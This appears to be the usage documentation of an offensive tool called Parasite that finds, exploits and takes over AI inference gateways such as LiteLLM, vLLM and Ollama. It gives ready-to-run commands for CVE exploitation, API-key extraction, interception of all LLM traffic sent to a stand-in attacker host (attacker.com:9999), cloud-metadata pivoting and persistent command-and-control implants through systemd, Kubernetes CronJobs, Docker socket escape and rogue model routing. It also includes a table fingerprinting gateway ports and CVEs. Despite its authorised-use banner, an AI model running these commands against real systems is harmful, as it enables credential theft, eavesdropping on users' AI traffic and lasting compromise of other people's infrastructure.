Universal AI Gateway Exploitation Engine — v1.0.0 — 237 tests
AUTHORIZED USE ONLY. This tool requires explicit written authorisation for each engagement. Unauthorized use violates the Computer Misuse Act 1990, CFAA, and equivalent legislation. All operations are logged and Ed25519-signed.
git clone https://github.com/RichardBarron27/red-specter-specter-parasite cd red-specter-specter-parasite pip install -e . parasite --help
# Generate Ed25519 key
python3 -c "
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.hazmat.primitives import serialization
key = Ed25519PrivateKey.generate()
pem = key.private_bytes(serialization.Encoding.PEM, serialization.PrivateFormat.PKCS8, serialization.NoEncryption())
open('parasite.key','wb').write(pem)
print('Key written to parasite.key')
"
export PARASITE_KEY=/path/to/parasite.key
# Create ROE file — must contain exact string cat > roe.txt << 'EOF' gateway exploitation authorised engagement: internal-red-team-2026-06 operator: richard targets: 192.168.100.0/24 EOF export PARASITE_ROE_FILE=/path/to/roe.txt
Discover and fingerprint AI gateways on a host or CIDR range.
parasite scan --target 192.168.1.100 parasite scan --target 192.168.1.100 --ports 4000,8000,11434 parasite scan --cidr 10.0.0.0/24 --timeout 2
| Flag | Description | Default |
|---|---|---|
| --target | IP address or hostname | required |
| --cidr | CIDR range for subnet scan | — |
| --ports | Comma-separated port list | all known gateway ports |
| --timeout | TCP connect timeout (seconds) | 2.0 |
| --output | JSON output file path | — |
Deep auth analysis and attack surface enumeration. OPEN gate.
parasite probe --target 192.168.1.100:4000 parasite probe --target 192.168.1.100:4000 --werkzeug --machine-id abc123 --mac 00:23:ae:31:54:61
| Flag | Description |
|---|---|
| --target | host:port to probe |
| --werkzeug | Also compute Werkzeug debugger PIN (requires --username, --app-file, --machine-id, --mac) |
| --jwt TOKEN | JWT to attack (brute force + alg:none + RS256 confusion) |
Attempt all applicable CVE exploits. INJECT gate required.
export PARASITE_KEY=/path/to/parasite.key parasite breach --target 192.168.1.100:4000 parasite breach --target 192.168.1.100:4000 --cve CVE-2026-42208 # specific CVE only
Extract API keys from gateway config, env vars, and memory. INJECT gate required.
parasite siphon --target 192.168.1.100:4000 --breach-result breach.json
Inject LiteLLM CustomLogger to capture all LLM traffic. UNLEASHED gate required.
export PARASITE_KEY=/path/to/parasite.key export PARASITE_ROE_FILE=/path/to/roe.txt parasite intercept --target 192.168.1.100:4000 --c2-url http://attacker.com:9999 --breach-result breach.json
Cloud metadata pivot and provider account testing. UNLEASHED gate required.
parasite traverse --target 192.168.1.100:4000 --breach-result breach.json --credentials creds.json
Deploy persistent C2 mechanism. UNLEASHED gate required.
parasite implant --target 192.168.1.100:4000 \
--mechanism systemd \
--c2-url http://attacker.com:9999 \
--breach-result breach.json
| Mechanism | Description | Gate |
|---|---|---|
| systemd | network-helper.service, Restart=always | UNLEASHED |
| k8s | CronJob in kube-system, every 6h | UNLEASHED |
| docker | Escape via /var/run/docker.sock | UNLEASHED |
| litellm_model | Phantom gpt-4o-mini routing to attacker | UNLEASHED |
Full pipeline: SCAN → PROBE → BREACH → SIPHON → [INTERCEPT → TRAVERSE → IMPLANT] → REPORT
# OPEN gate — scan + probe only
parasite engage --target 192.168.1.100:4000
# INJECT gate — adds BREACH + SIPHON
parasite engage --target 192.168.1.100:4000 --gate inject
# UNLEASHED gate — full pipeline
parasite engage --target 192.168.1.100:4000 --gate unleashed \
--c2-url http://attacker.com:9999 \
--output /tmp/pst-report.json
| Variable | Required For | Value |
|---|---|---|
| PARASITE_KEY | INJECT+ | Path to Ed25519 PEM private key file |
| PARASITE_ROE_FILE | UNLEASHED+ | Path to ROE file (must contain "gateway exploitation authorised") |
{
"report_id": "PST-a1b2c3d4e5f6", // Ed25519-signed
"tool_number": 131,
"version": "1.0.0",
"layer": "L29 AI Inference Infrastructure",
"timestamp": 1749499200,
"gateway": { "type": "litellm", "host": "...", "port": 4000 },
"breach": { "technique": "cve_2026_42208", "success": true },
"credential_count": 12,
"valid_credentials": 8,
"total_burn_rate_per_hour_usd": 24.00,
"intercept_active": true,
"wmd_classes": ["ai_gateway_takeover", ...],
"mitre_attack": ["T1190", "T1552.001", "T1557", "T1565.001", "T1078", "T1071.001"],
"mitre_atlas": ["AML.T0043", "AML.T0056", "AML.T0040", "AML.T0051"],
"_signature": "..." // hex-encoded Ed25519 signature
}
| Type | Default Port | Detection Probe | CVEs |
|---|---|---|---|
| LiteLLM | 4000 | /health → litellm_version | CVE-2026-42271, 42208, 25536 |
| vLLM | 8000 | /health → vllm_version | CVE-2026-22778, CVE-2024-5483 |
| Ollama | 11434 | / → "Ollama is running" | CVE-2026-7482 |
| LM Studio | 1234 | /v1/models → object | — |
| LocalAI | 8080/5001 | /api/v1/ping → pong | — |
| Text Generation WebUI | 7860/5000 | port hint | — |
| OpenWebUI | 3000/8080 | port hint | — |
| HuggingFace TGI | 80/443 | /info → model_id | — |
| Triton Inference Server | 8001/8002 | /v2/health/ready → live | — |
| Ray Serve | 8000 | /api/v1/health → status:OK | — |
| BentoML | 8080 | /readyz → status:ok | — |
| MLflow Serving | 5000 | /api/v1/models/list → models | — |
| Dify | 3000/3100 | port hint | — |
| Flowise | 9999 | port hint | — |
| nginx-ui | 9000 | port hint | CVE-2026-33032 |
| OpenAI-Compatible | any | /v1/models → object + data | CVE-2026-25536 |